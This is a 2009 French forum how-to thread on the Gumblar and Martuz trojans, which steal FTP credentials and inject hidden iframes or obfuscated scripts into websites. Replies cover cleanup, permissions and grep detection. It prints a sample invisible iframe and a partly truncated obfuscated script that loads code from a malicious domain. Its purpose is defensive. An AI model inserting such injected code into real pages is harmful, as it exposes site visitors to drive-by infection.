Attaques Sites Web par Iframes (et similaires) :
Problèmes et Solutions (Gumblar, Martuz, etc.)

Ce post (en 2 parties, à cause des limites du forum) explique comment de nombreux sites Web peuvent voir le code de leur pages modifié par des systèmes viraux ("virus") malveillants qui y incluent des connections cachées vers des sites également malveillants.

Ces systèmes viraux de type « trojans » (« cheval de Troie ») sont installés sur les PC des webmasters et détectent les codes FTP pour les utiliser et permettre la modification des pages web qui deviendront à leur tour des vecteurs de contagion.

Les contagions connues jusqu’ici ont été effectuées par le biais de versions anciennes (mais très utilisées) des logiciels Adobe Reader (PDF Reader) pour la lecture de fichiers au format PDF, et Adobe Flash Player pour la lecture de fichiers au format Flash. Mais des failles d’autres logiciels peuvent évidemment être utilisés.

Des solutions et méthodologies pour faire face à ces attaques sont proposées.


Introduction :

Tout spécialement depuis mai 2009, mais également auparavant pour une moindre part, des webmasters ont vu des lignes de code étranges apparaître dans leur pages web, et celles-ci se connecter à des sites hautement suspects, de manière invisible pour l'utilisateur ordinaire.

Souvent, les webmasters eux-mêmes ne réalisent le problème que par hasard, en éditant un fichier par exemple.

Typiquement, la forme la plus banale du code malicieux introduit ressemble plus ou moins à ceci :
<iframe src="http://sitesuspect:8080/index.php" width=107 height=152 style="visibility: hidden"></iframe>

Un iframe est, en termes courants, une sorte de cadre sur une page web, cadre qui connecte directement cette page web à une autre, faisant apparaître cette autre page dans le cadre. Mais l’iframe peut être formaté pour être invisible !

Bien que très pratique, la fonction iframe n'offre aucune sécurité pour l'utilisateur final qui se trouve connecté -parfois sans le savoir- à un autre site/page presque comme s'il s'y était connecté directement. Si l'autre site/page est malveillant ou simplement mal sécurisé, les conséquences peuvent être graves. (Evidemment, si l'autre site/page est sécurisé et bien contrôlé, par exemple en appartenant au même webmaster, ce problème ne se pose pas.). Pour ces raisons, l’usage de l’iframe n’est pas recommandé.

Pour complique les choses, depuis mai 2009, des codes malicieux beaucoup plus complexes et furtifs ont fait leur apparition et sont extrêmement difficiles à détecter sur des pages un tant soit peu sophistiquées.

Par exemple (code volontairement altéré avec « …… » et des parties supprimées) :
(function(jil){var xR5p='%';eval(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6 …………… "65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff ……………………………… 3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);

[Note pour les programmeurs : la plupart du temps, la fonction n’a pas de nom. Elle est anonyme et s’auto-appelle (self-invoking)]

Ces attaques sont l’œuvre de variantes du virus de type "trojan" Gumblar (du nom du site -aujourd'hui disparu- vers lequel il dirigeait l'iframe), devenu par la suite Martuz (plus difficile à détecter car cachant mieux les URL malicieuses), et ayant, comme on vient de le dire, encore évolué depuis. (De pire en pire.)


Principe de la contagion (en très résumé) :

Ces trojans utilisent des faiblesses de certains logiciels : Adobe Reader (aussi appelé PDF Reader, Acrobat Reader), et Adobe Flash Player. (A noter que rien n'empêche théoriquement d'utiliser des faiblesses d'autres logiciels similaires.)

La contamination s'effectue donc la plupart du temps par l'intermédiaire de ces logiciels par les fichiers qu'ils téléchargent / jouent.

Une fois le PC contaminé, il va à son tour tenter de propager la contagion de la manière suivante : il recherche des codes FTP présents sur l'ordinateur, et les utilise pour placer l'iframe malicieux sur les sites accessibles par le FTP. Ces sites contamineront d'autres PC, et ainsi de suite.

La méthode est de plus en plus sophistiquée: par exemple, comparer (sites en anglais) :
http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/
http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/

Les pages web affectées sont le plus souvent les pages du type index.php, index.htm, index.html, etc. (Ceci nous permettra de proposer plus loin une méthode de détection de la contagion.) Mais toute page peut être affectée (y compris si le virus fait une « erreur »). Les « templates » ou autres fichiers servant à générer des pages web dynamiques (forums, CMS, Blogs, wikis,…) peuvent également être contaminés, et le sont désomais de plus en plus.



Résolution :

1) Pour TOUS les PC susceptibles d'être contaminés, même si on pense qu'il ne le sont pas :

- Videz les caches de votre navigateur quand vous nettoyez votre système ou simplement suspectez une attaque. Videz-les avant de commencer un examen ou un nettoyage ; videz-les après également ; et vides-les plusieurs fois par sécurité pendant les opérations et systématiquement si vous pensez être passé sur une page contaminée.

- Télécharger les dernières versions de Adobe Reader et Adobe Flash Player, de préférence sur une machine sûre. (Il se peut que d'autres logiciels soient aujourd'hui en cause, mais il faut bien commencer par ce qui est connu !)

- Désinstaller totalement Adobe Acrobat Reader et Adobe Flash Player sur les PC.

- Mettre à jour ses anti-virus. (Il se trouve que l'anti-virus AVAST -même la version gratuite- a été le premier capable de détecter et éradiquer Gumblar en mai dernier, mais cela aurait pu être un autre produit : un anti-virus ne vaut que ce que vaut son actualisation et la rapidité de celle-ci.)
Il peut être souhaitable, dans les cas extrêmes, de lancer l'antivirus à partir d'un CD-ROM bootable propre mais normalement cela n'est pas nécessaire avec cette famille de virus.

- Lancer un anti-virus (à jour ! ) et faire un scan complet.

- Supprimer autant que possible tous les fichiers inutiles de votre PC

- Ensuite installer les dernières versions de Adobe Acrobat Reader et Adobe Flash Player[

- Profitez-en pour mettre à jour vos autres plug-ins, add-ons, etc.
Voir aussi plus bas: "Bonne nouvelle pour les utilisateurs de Firefox :
une page Web de Mozilla pour signaler les plug-ins périmés"/INDENT]


2) Sur TOUS les sites pour lesquels vous avez des accès FTP, même si vous pensez qu'ils ne sont pas contaminés :


-Restaurer à partir d'une sauvegarde saine, ou générer les pages à nouveau. Et changer vos codes FTP (au moins le mot de passe).
Sinon, sans fichiers propres, voilà la galère :

- Changer vos codes FTP (au moins le mot de passe)

- Avant de nettoyer votre site, videz le(s) cache(s) de vos sites web si ceux-ci mettent des pages en cache ! (C'est normalement le cas sur CMS, blogs, forums, wikis, etc.)Et n'oubliez pas le pages statiques générées par certains add-ons de CMS pour se substituer aux pages dynamique quand il n'est pas nécessaire que la page soit recréée à chaque fois.

- Rechercher le terme "iframe" dans toutes les pages. (OUi, c'est très pénible.)
[I]Pour des logiciels permettant la recherche sur fichiers multiples, voire note à la fin du second messages de ce How-To.

- Rechercher aussi le terme "iframe" dans tous les templates (ou autre terminologie) utilisés par vos Forums, CMS, Blogs, Portails, etc. pour créer les pages dynamiques.

- Vérifier si l'usage de l'iframe est légitime ou non (normalement un codeur ne pas pas utiliser d'iframe dans son travail sauf s'il est totalement obligé de le faire)

- Supprimer les lignes de codes se rapportant à l'iframe illégitime. Attention, plus le virus est malin, plus cette opération peut être difficile. (Par exemple, s'il a utilisé plusieurs lignes d'instructions pour produire le même effet que la ligne de type classique citée plus haut.)

- Faire de même avec "script src=", pour les Martuz-like
(Voir http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/ )

- Faire de même avec " “(function(“ " et éventuellement d'autres choses (et là ça peut être l'enfer).
Pour un descriptif complet des scripts, voir :
http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/
http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/

- Faire évidemment un nouveau backup du site. Et vérifier que les anciens backups ne sont pas contaminés !

- Il peut être souhaitable de lancer des recherches sur les chaînes de caractères suspectes pour déceler du code mieux dissimulé, par exemple sur "visibility: hidden", voire, si l'on est réellement inquiet sur "http://" et vérifier les URL... ce qui sera évidemment pénible.


Demander à toutes les personnes ayant possédé les codes de vos FTP qu'elles fassent impérativement la même chose sur TOUS leurs PC et TOUS leurs propres sites !




Suite dans le post ci-dessous


Mots-clés pour la recherche sur le forum : adobe acrobat PDF reader flash player iframe attaque piraté hacké sécurité virus trojan gumblar martuz attaque FTP codes how-to permissions index

Suite du post précédent

3) Appliquez une (pénible) mesure de sécurité de base consistant à modifier les droits des dossiers et fichiers pour gêner les tentatives de piratage, sauf impossibilité technique :
- Mettre tous les dossiers en droits 505 *
- Mettre tous les fichiers en droits 404, y compris les .htaccess et divers "config" *
- Pour un dossier qui nécessite des droits d'écriture par le serveur, utiliser 705
- Pour un fichier qui nécessite des droits d'écriture par le serveur, utiliser 604
- Vérifiez que le dossier racine web, le "www", est bien en 705. Il n'y a pas de raison de le changer.
* Attention : Ces réglages vous empêchent de mettre à jour vos CMS, forums, etc.; ou d'installer des"Mods", add-ons, etc. Préalablement à de telles opérations :
[INDENT]- Passer les fichiers en 604
- Passer les dossiers en 705
et, quand vous avez fini, remettez 404 et 505.
Si vous ne voulez pas le faire pour tous les fichiers, faîtes-le au moins pour les fichiers index.* Ce sera mieux que rien.

4) Mesure éventuelle de sécurité supplémentaire :
Si vous n'êtes pas sûrs de votre sécurité FTP sur votre PC, utilisez éventuellement Linux pour faire du FTP (divers clients FTP disponibles). Ce n'est pas que Linux soit invulnérable (après tout, le premier virus "Ver" de l'histoire de l'informatique était sous Unix), c'est seulement que les créateurs de sytèmes viraux pour PC privilégient les systèmes les plus répandus, et donc Windows. C'est plus rentable



Références (parmi d'autres), en anglais :

Remove Gumblar :
http://www.webologist.co.uk/2009/05/gumblar-virus-threat-to-the-internet-how-to-remove.html

Autres sources :
http://www.scmagazineus.com/Gumblar-website-compromises-increase-188-percent-this-week/article/136836/
http://www.computerweekly.com/Articles/2009/05/15/236069/reports-of-gumblars-death-greatly-exaggerated.htm

Explications sur les mutations du virus (Gumblar vers Martuz à titre d'exemple) :
http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/

Descriptif complet de certaines versions de scripts "furtifs" :
http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/
http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/

Information sur les logiciels Adobe concernés :
http://www.adobe.com/support/security/index.html#readerwin
http://www.adobe.com/support/security/index.html#flash
http://www.adobe.com/support/security/index.html (home page sécurité)



Détection éventuelle d’une contagion future par la méthode du "pot de miel" ("honeypot") :

On a vu que les codes malicieux étaient de plus en plus complexes et donc difficile à repérer dans des pages elles-mêmes complexes, comme c’est souvent le cas maintenant sur le web.

Toutefois, les pages web affectées sont le plus souvent les pages du type index.php, index.htm, index.html, etc.

Il est donc -sans garantie absolue de réussite- possible de créer des pages « index » témoins extrêmement simples et facile à lire, avec juste le code minimal d’une page html ou php, etc. à des endroits où elles ne servent à rien.

Par exemple, si votre vrai index est index.php, créez un index.html, etc. (Attention, vous pouvez avoir besoin de configurer un fichier .htaccess pour être bien sûr que votre site continuera à utiliser le bon index ! Se reporter aux documentations appropriées.)

Vous pouvez aussi placer des pages index dans des dossiers volontairement vides. (Même remarque que ci-dessus : veillez aux règles sur les pages index.)

Avec un peu de chance, le système viral sera « attiré » par ces fausses pages index (abeilles et pot de miel) et les infectera toutes. Or, vos pages témoins sont faciles à lire. Dans ce cas, vous pourrez vous rendre compte de l’attaque, et, en prime, voir clairement le code utilisé !

Attention : on ne peut évidemment pas garantir le succès de cette méthode.



Note importante :

Ainsi que je l'ai dit, rien n'empêcherait d'utiliser d'autres logiciels que ceux cités ici pour réaliser le même type de contamination. Il est même vraisemblable que cela sera essayé tôt ou tard ou même l'a peut-être déja été. Il est donc absolument impératif d'utiliser des anti-virus ET des anti-malware à jour ET de veiller à la mise à jour de vos plug-ins de navigateurs et dispositifs similaires..

Dans le cas où, sur des PC suspects, un anti-virus ne donne rien, il peut être judicieux de le désinstaller et en installer un autre pour faire un nouveau test. (Désinstaller n'est pas strictement obligatoire, mais généralement les anti-virus cohabitent mal.)



Bonne nouvelle pour les utilisateurs de Firefox :
une page Web de Mozilla pour signaler les plug-ins périmés
(Ajouté le 6 octobre 2009, au stade de semi-beta de la page/)

Firefox 3.5.3 et 3.0.14 pouvaient vous avertir des plug-ins Adobe Flash Player, ici:
http://en-us.www.mozilla.com/en-US/firefox/3.5.3/whatsnew/
toutefois Mozilla a décidé d'aller plus loin.

Face aux problèmes causés par l'utilisation de failles de sécurité dans les Plug-ins périmés (notamment Adobe Flash Player, voir le How-To), Mozilla vient d'ouvrir une page semi-beta permettant de savoir quels sont vos plug-ins périmés et de les mettre à jour.

Voici l'annonce:
http://blog.mozilla.com/webdev/2009/10/02/upyourplug-needs-your-help/

Et voici la page:
https://www-trunk.stage.mozilla.com/en-US/plugincheck/

Attention, vous aurez un avertissement de sécurité à cause d'un certificat qui ne fonctionne pas au moment d'écrire ces lignes. (Bien joué, Mozilla! :rolleyes:)
Il faut utiliser la fonction "ajouter une exception" pour utiliser cette page de détection des plug-ins.






Logiciels permettant la recherche d'une chaîne de caractères sur plusieurs fichiers à la fois :

Notepad++, excellent éditeur (gratuit), possède une fonction de recherche sur multiples fichiers, et un plug-in pour travailler avec un FTP. (Maintenant fourni avec la version complète gratuite.)
http://notepad-plus.sourceforge.net/uk/site.htm

Il y a aussi (merci à cbfr) File Seeker :
http://www.softpedia.com/get/System/File-Management/Qytec-File-Seeker.shtml

Dans les deux cas, toutefois, il faut avoir les fichiers sur son ordinateur Windows pour pouvoir les explorer. (Donc éventuellement les recopier depuis le FTP.)



Voilà, c'est résumé (:eek:) mais j'espère que ça a été utile.



Mots-clés pour la recherche sur le forum : adobe acrobat PDF reader flash player iframe attaque piraté hacké sécurité virus trojan gumblar martuz attaque FTP codes how-to permissions index


Edit:
- 4 août 2009, ajout des informations sur les logiciels permettant la recherche sur fichiers multiples.[
- 22 août 2009, ajout d'information sur les caches des navigateurs, les pages mises en cache sur le FTP par les CMS, forums, etc., la sécurité par modification des droits sur les fichiers et dossiers, usage de clients FTP Linux, divers petits changements
- Septembre 2009, modifications mineures pour souligner l'extensions des risques.
- 6 octobre 2009, ajout de l'information "Bonne nouvelle pour les utilisateurs de Firefox :
une page Web de Mozilla pour signaler les plug-ins périmés"

Note accessoire :
Vous pouvez éventuellement, si cela vous convient, et avec les réserves d'usage, utiliser le lecteur de PDF Foxit, au lieu du lecteur "originel" d'Adobe. (Les logiciels "officiels" sont généralement plus attaqués que les logiciels "alternatifs".) Il existe une version gratuite.
http://www.foxitsoftware.com/pdf/reader/
(Logiciel suggéré par Daweb)

- Rechercher le terme "iframe" dans toutes les pages. (OUi, c'est très pénible.)

le logiciel fseeker (gratuit) permet de rechercher des mots, suite de mots, chaînes etc. directement a partir de la racine ou de répertoire et/ou par type de fichier (php, html, inc, css ...)

For Windows only
Un outil très pratique.

Mots-clés pour la recherche sur le forum : adobe acrobat PDF reader flash player iframe attaque piraté hacké sécurité virus trojan gumblar martuz attaque FTP codes how-to

le logiciel fseeker (gratuit) permet de rechercher des mots, suite de mots, chaînes etc. directement a partir de la racine ou de répertoire et/ou par type de fichier (php, html, inc, css ...)

For Windows only
Un outil très pratique.


Merci cbfr. :) J'avais oublié de mentionner dans le How-to ce que j'avais dit dans une réponse quelque part : Notepad++, excellent éditeur (gratuit), possède une fonction de recherche sur multiples fichiers, et un plug-in pour travailler avec un FTP. (Maintenant fourni avec la version complète gratuite.)
http://notepad-plus.sourceforge.net/uk/site.htm


Pour fseeker, en fait File Seeker, que tu mentionnes, voilà le lien pour les lecteurs du forum :
http://www.softpedia.com/get/System/File-Management/Qytec-File-Seeker.shtml

Dans les deux cas, toutefois, il faut avoir les fichiers sur son ordinateur Windows pour pouvoir les explorer. (Donc éventuellement les recopier depuis le FTP.)

Sinon, il y a un programme payant (pas trop cher pour une "Personal Home License")

HandyFile Find and Replace - Text Workbench version
http://www.silveragesoftware.com/search-replace-text-tool.html

Si quelqu'un connaît autre chose, moins cher ou éventuellement gratuit... suggestions bienvenues ! :)


J'édite le How-To avec ces informations.

Un iframe est, en termes courants, une sorte de cadre sur une page web, cadre qui connecte directement cette page web à une autre, faisant apparaître cette autre page dans le cadre. Mais l’iframe peut être formaté pour être invisible !

Je ne comprend pas comment l'iframe peut être invisible, tu veux dire que la taille est de 0 pixel sur 0 pixel et que donc personne ne peut la voir sauf dans le code source ? Donc le script de la page appelé s'effectue sans qu'on voit cette page ?

Sous firefox en tout cas, après l'attaque que j'ai reçu par ses iframes, le code était visible. Mais le plus ennuyant c'est que lors de l'ajout de code, il supprime du code à vous en fin de page.

Je ne comprend pas comment l'iframe peut être invisible, tu veux dire que la taille est de 0 pixel sur 0 pixel et que donc personne ne peut la voir sauf dans le code source ? Donc le script de la page appelé s'effectue sans qu'on voit cette page ?

Il suffit d'un tag de CSS style="visibility: hidden". Tu as l'exemple dans le code-type en une ligne que je donne au début.

Par exemple :
<iframe src="http://www.ovh.com" width=107 height=152></iframe>
est un iframe visible, mais
<iframe src="http://www.ovh.com" width=107 height=152 style="visibility: hidden"></iframe>
est un iframe invisible. Il suffit ensuite qu'il soit bien placé dans la page, mais on peut évidemment faire plus sophistiqué !


Sous firefox en tout cas, après l'attaque que j'ai reçu par ses iframes, le code était visible. Mais le plus ennuyant c'est que lors de l'ajout de code, il supprime du code à vous en fin de page.

Le code, par définition, sera toujours visible. C'est l'iframe qui peut être dissimulé. Toutefois, comme expliqué dans mon How-To, le code peut être habilement dissimulé et ne plus être la simple ligne citée dans mon premier example.

Toutefois, si l'injection du code malveillant supprime du "bon" code sur la page, c'est que l'on a affaire à quelqu'un de peu doué (mais le code reste dangereux), car, par principe, un système viral malveillant ne doit pas éveiller les soupçons du propriétaire de site.

Edit 5 août 2009: typographie

Bonjour,
Tous mes sites ont attrapé ce m...
Autant sur 1&1 que sur Ovh . J'ai pour l'instant peu de fichiers sur OVH

J'ai trop de fichiers chez 1&1 pour les descendre sur mon PC
Je me suis connecté en mode terminal avec "putty"
Les fichiers infectés sont index.php , index.htm ou html et même un fichier configurer.php
En mode commande, je vérifie les fichiers infectés avec :
> find . -type f -name "*" -exec grep iframe '{}' \;
mais cela ne montre pas ou ils se trouvent sur l'arborescence

Pour cela je fais une liste de tous les fichiers présents avec :
find . -type f -name "*" -exec ls -l '{}' \; > liste_fichiers
ensuite faut un peu modifier la liste :
- supprimer le début de chaque ligne pour ne garder que ./rep1/fich1
Ensuite j'ai créé un petit shell "chercher" par exemple :
for i in `cat liste_fichier
do
echo $i
grep $i iframe | grep 8080
done

et je lance :
> sh chercher

Bon si vous avez plus simple, je suis preneur

Par contre je ne sais pas si on connait le nom du script incriminé

A suivre
Christian

Rectificatif

j'ai oublié un ` en fin de ligne , lire :
for in in `cat liste_fichier`


Je n'ai pas encore tout automatisé mais cela devrait être possible
avec la commande "sed"

Christian

Je viens d'avoir été infecté. Bon, déjà, merci le backup, ce qui m'a accéléré la procédure de remise sur pied des sites. Sinon, au revoir AVG qui n'a rien vu passer chez moi...

Pour chercher les fichiers incriminés, j'ai fait :


grep -nri "http://c6p.at:8080" *
grep -nri "<iframe src=" *

Et ce dans les répertoires concernés. Le c6p était l'url qui revient tout le temps.

Par contre, ce qui me stress, c'est qu'un fichier qui n'était pas présent dans un répertoire accessible par FTP a été modifié... Ca accède via SFTP ?

Pour chercher les fichiers incriminés, j'ai fait :
grep -nri "http://c6p.at:8080" *
grep -nri "<iframe src=" *

Et ce dans les répertoires concernés. Le c6p était l'url qui revient tout le temps.

Tu as beaucoup de chance (tout est relatif) d'avoir été infecté par une version "simple" qui ne dissimule pas mieux les codes malicieux et les URL. (Voir détails dans mon How-To.)

Par contre, ce qui me stress, c'est qu'un fichier qui n'était pas présent dans un répertoire accessible par FTP a été modifié... Ca accède via SFTP ?

Plusieurs personnes le rapportent... donc, oui, il semble, mais je n'ai pas pu (encore) le constater moi-même.

En attendant, je ne sais toujours pas quelle machine a été infectée. AVG n'a rien trouvé, Avast non plus, mawarebytes' Anti-Malaware non plus..
Je me suis connecté depuis le Mac, mais je ne trouve rien sur les PCs. Quelqu'un connait un antivirus efficace contre ce virus/spyware ?

En attendant, je ne sais toujours pas quelle machine a été infectée. AVG n'a rien trouvé, Avast non plus, mawarebytes' Anti-Malaware non plus..
Je me suis connecté depuis le Mac, mais je ne trouve rien sur les PCs. Quelqu'un connait un antivirus efficace contre ce virus/spyware ?

Comme je le disais dans le How-To, un anti-virus ne vaut que ce que valent ses mises à jour, pas de miracle. Si, à la fois, AVAST et AVG, mis à jour (!), ne détectent rien maintenant et toujours rien après quelques mises à jour de plus sur quelques jours, je tendrais à penser que le PC testé n'est pas infecté et que la source est ailleurs. Pour autant, on peut vérifier ce qui se passe sur ton PC avec le firewall dans les logs de celui-ci : voit-on des connexions ou tentatives de connexion vers l'extérieur qui soient anormales ?

Essaye aussi Spybot Search & Destroy

Ton site est-il de nouveau contaminé ou pas ?

Les PC de tes collaborateurs ou autres PC que tu utilises ont-ils été vérifiés ?

Tes mots de passe FTP ont-ils été changés ?

D'autre part, tous les logiciels qui servent à administrer / modifier / etc des sites ou installations distantes doivent toujours être en "autorisation de connexion à demander" sur le firewall, jamais en "toujours permis". (Et cela ne constitue évidemment pas une protection absolue !)

Seul deux PCs ont accès à ces sites, celui du boulot et celui chez moi à la maison. j'ai bien sur fait les maj des antivirus (elles sont faites tous les jours), c'est ce que je trouve assez troublant.
Aucune autre personne n'a accès aux sites web que moi
J'ai aussi tenté Spoybot S&D (que des cookies trouvés, le truc classique)

Depuis le nettoyage des sites et le changement des pass, pas de nouvelle infection, mais je n'ai pas tenté de me reconnecter depuis ces deux PCs.

Je vais regarder les logs des firewall.. sauf que bon, j'utilise celui de Windows, en espérant trouver des logs (m'en vais demander à Google)

Question bête, n'est il pas possible de chopper une variante qui réside en mémoire tout simplement et une fois le PC rebooté, plus de trace ? Je n'ai eu que des modifications par iframe, assez simple à trouver, mais de code offusqué et autre choses sympatiques.

Si je ne trouve rien, je vais formater et réinstaller windoze, ça sera l'occasion d'installer Win7..

Pour ceux que ça intéresse, y'a pas de log par défaut avec le firewall de windows, il faut l'activer (centre de sécurité> avancé). Bref, aucune trace des évennements passés, on verra pour les futurs.

C'est peut-être stupide comme question mais si je me fais une VM Linux Ubuntu et que je m'en sert uniquement pour aller sur mon FTP OVH avec Filezilla, est-ce que c'est sécuritaire? Parce que ça fait trois fois que j'ai ce problème sur mon site et que je n'ai aucun virus sur mon PC Windows.

Depuis le 11 août, j'ai eu a faire le ménage quatre fois, et autant de changements de mots de passe ftp.

Là, ce 14 août, je suis passé juste après les robots spammer en iframe (impressionnant le nombre d'adresses IP réelles ou zombie utilisées !), pour modifier les vrais index (ceux qui sont accessibles pour l'internaute normal), j'ai laissé les autres, que je vais corriger en utilisant une solution que j'espère radicale :

je vais installer un poste sous un linux ou un unix dont la seule fonction sera les transferts ftp. Je ne remets pas en service avec les nouveaux MDP mon ftp actuel (ws_ftp) sous XP, ce serait avoir une fois de plus à restaurer les pages modifiées des sites (chez OVH, mais aussi ailleurs).

Je crois que la solution poste linux uniquement utilisé en application FTP pour la MAJ des sites distants (un vieux PC avec une carte réseau suffit) me paraît pour l'oeuvre la plus sûre : je vais voir. J'ai assez perdu de temps avec ces attaques et je n'ai pas envie de me faire blacklister par Google, ce qui serait un préjudice considérable.

Pour les failles CMS, je ne sais pas encore me prononcer. Pour Spip, j'utilise la version proposée par OVH, pour forum, une version stable de phpBB, et le reste est en pages statiques ou en scripts que j'héberge physiquement ailleurs.
C'est un cauchemar cette nouvelle vague d'attaques :-((

Bon, on aurait aussi la solution server side, qu'un applicatif de notre hébergeur n'autorise une session ftp qu'après qu'on ait indiqué dans le manager (qui est sous SSL) l'adresse IP autorisée. Perso je rentre à chaque fois mes identifiants login et pw, ils ne sont stockés nulle part. Certes, après il y aurait le problème keyloger (c'est pour ça que les banques passent par d'autres scripts à la souris sur pavé numérique ou alphanumérique pour les pw, malgré le ssl).

Je ne complète pas pour l'instant mon How-To, déjà long, non pas parce que l'on manque d'informations sur ces attaques... mais parce que l'on en reçoit trop, très partielles, et contradictoires parfois. Il faut trier et comparer.

Mais, voici une série de points supplémentaires ou de rappels qui peuvent aider :

- Si vous vous contentez de chercher "iframe", vous êtes perdants. Comme précisé dans le How-To, il faut aussi, par exemple, chercher " “(function(“ "

- Videz les caches de votre navigateur quand vous nettoyez votre système ou suspectez une attaque

- Quand vous nettoyez votre site, videz le(s) cache(s) de vos sites web si ceux-ci mettent des pages en cache ! (C'est normalement le cas sur CMS, blogs, forums, wikis, etc.) Et n'oubliez pas le pages statiques générées par certains add-ons de CMS pour se substituer aux pages dynamique quand il n'est pas nécessaire que la page soit recréée à chaque fois.

- Vérifiez TOUS les PC... tous. Un seul contaminé, et ça repart.

- Mettez à jour vos CMS, forums, etc.

- Eliminez tous les fichiers inutiles de votre PC

- Utilisez éventuellement Linux pour faire du FTP (divers clients FTP disponibles). Ce n'est pas que Linux soit invulnérable (après tout, le premier virus "Ver" de l'histoire de l'informatique était sous Unix), c'est seulement que les créateurs de sytèmes viraux pour PC privilégient les systèmes les plus répandus, et donc Windows. C'est plus rentable.



y'a pas de log par défaut avec le firewall de windows, il faut l'activer (centre de sécurité> avancé). Bref, aucune trace des évennements passés

Horreur et consternation. :rolleyes: Cela dit, le firewall de windows marche correctement, bien qu'extrêmement basique. Tu pourrais envisager ZoneAlarm (version gratuite), tout de même plus complet et également basé sur une logique d'autorisation par application. Ensuite, il y a d'autres produits qui gèrent aussi les logiques par ports, services, etc. (Mais mieux vaut un firewall simple qu'un firewall sophistiqué mal configuré comme dans 50% des cas.)


C'est peut-être stupide comme question mais si je me fais une VM Linux Ubuntu et que je m'en sert uniquement pour aller sur mon FTP OVH avec Filezilla, est-ce que c'est sécuritaire? Parce que ça fait trois fois que j'ai ce problème sur mon site et que je n'ai aucun virus sur mon PC Windows.

TOUS ( t o u s ) les PC sont sûrs ? Sûrs de sûrs ? Alors il pourrait y avoir une attaque par une faiblesse de tes sites. C'est d'ailleurs beaucoup plus classique.

Vaste sujet. Néanmoins une mesure de sécurité de base consiste à modifier les droits des dossiers et fichiers pour gêner les tentatives de piratage. C'est légèrement pénible...

Sauf impossibilité technique :
- Mettre tous les dossiers en droits 505 *
- Mettre tous les fichiers en droits 404, y compris les .htaccess et divers "config" *
- Pour un dossier qui nécessite des droits d'écriture par le serveur, utiliser 705
- Pour un fichier qui nécessite des droits d'écriture par le serveur, utiliser 604
- Vérifiez que le dossier racine web, le "www", est bien en 705. Il n'y a pas de raison de le changer.
* Attention : Ces réglages vous empêchent de mettre à jour vos CMS, forums, etc.; ou d'installer des"Mods", add-ons, etc. Préalablement à de telles opérations :
- Passer les fichiers en 604
- Passer les dossiers en 705
et, quand vous avez fini, remettez 404 et 505.


je vais installer un poste sous un linux ou un unix dont la seule fonction sera les transferts ftp.
Oui, cela peut aider à la sécurité, voir plus haut dans ce fil.



Bon, on aurait aussi la solution server side, qu'un applicatif de notre hébergeur n'autorise une session ftp qu'après qu'on ait indiqué dans le manager (qui est sous SSL) l'adresse IP autorisée.
Tout à fait, avec évidemment possibilité de changer à chaque fois (IP non fixe, voyages, etc.)

Finalement il restait des virus sur mon PC. Un scan antivirus a révélé des virus dont je n'avais pas été informé lors de l'apparition.

J'ai fais un ménage:
- Désinstallation de Flash Player, Acrobat Reader et FileZilla
- Destruction de tout ce qui est relié à ces trois logiciels
- Scan avec Spybot, Ad-Aware, Malwarebytes et Antivir (2 fois)
- Changement de mot de passe ftp pour la 3e fois
- Installation de Flash Player et FileZilla (j'ai pas besoin de acrobat en fait)
- Nettoyage de tous les fichiers index.html
- Ajout d'une option pour utiliser autre chose que index.html dans mon .htaccess
- Changement du nom de tous les index.html avec le nom de la nouvelle nomenclature
- Changement des droits de tous ces fichiers html pour 444 et du .htaccess pour 404
- De plus je vais maintenant utiliser Orca Browser (moteur FireFox) avec Adblock Plus, Flashblock et NoScript au lieu de Avant Browser (moteur IE)

Est-ce vraiment nécessaire de modifier les dossiers pour 505? Déjà qu'à chaque fois que je veux modifier un fichier html je dois changer ses droits, je ne veux pas en plus à avoir à modifier tous les dossier en haut. De toute façon c'est le fichier html qui est modifié par le virus, pas les dossiers donc quelle est l'utilité?

J'ai aussi fais un dossier test avec un fichier index.html non protégé (droits 604), un fichier index.html protégé (droits 444) et un fichier html (droits 604) avec la nouvelle nomenclature décrite dans le .htaccess.

Je vais voir ce que ça donne. Si ça revient, la prochaine étape c'est une VM Linux...

Finalement il restait des virus sur mon PC. Un scan antivirus a révélé des virus dont je n'avais pas été informé lors de l'apparition.

D'une certaine manière, je suis soulagé, parce que, maintenant, la situation est coherente ! :)


Est-ce vraiment nécessaire de modifier les dossiers pour 505? Déjà qu'à chaque fois que je veux modifier un fichier html je dois changer ses droits, je ne veux pas en plus à avoir à modifier tous les dossier en haut. De toute façon c'est le fichier html qui est modifié par le virus, pas les dossiers donc quelle est l'utilité?.

Nécessaire, non... c'est une bonne (et ennuyeuse) mesure en général et appropriée en temps de crise.

A quoi cela sert-il ? Eh bien, un pirate va tenter de manière automatisée ou manuelle de trouver un moyen d'accéder à ton site. Ensuite, il va chercher à uploader et/ou modifier des fichiers. Avec tes fichiers en 404, il ne peut pas les modifier. Mais il peut uploader ! Avec des dossiers en 505, il ne peut pas uploader. Maintenant, évidemment, s'il a obtenu les codes FTP, il peut faire ce qu'il veut, mais avec une nuance toutefois : si son procédé est plutôt automatisé, il peut buter sur des permissions restrictives. Cela dépend de comment il est fait.

Ok, je vais attendre d'avoir des fichiers indésirables avant de faire ça. Merci chbj!

Ok, je vais attendre d'avoir des fichiers indésirables avant de faire ça. Merci chbj!


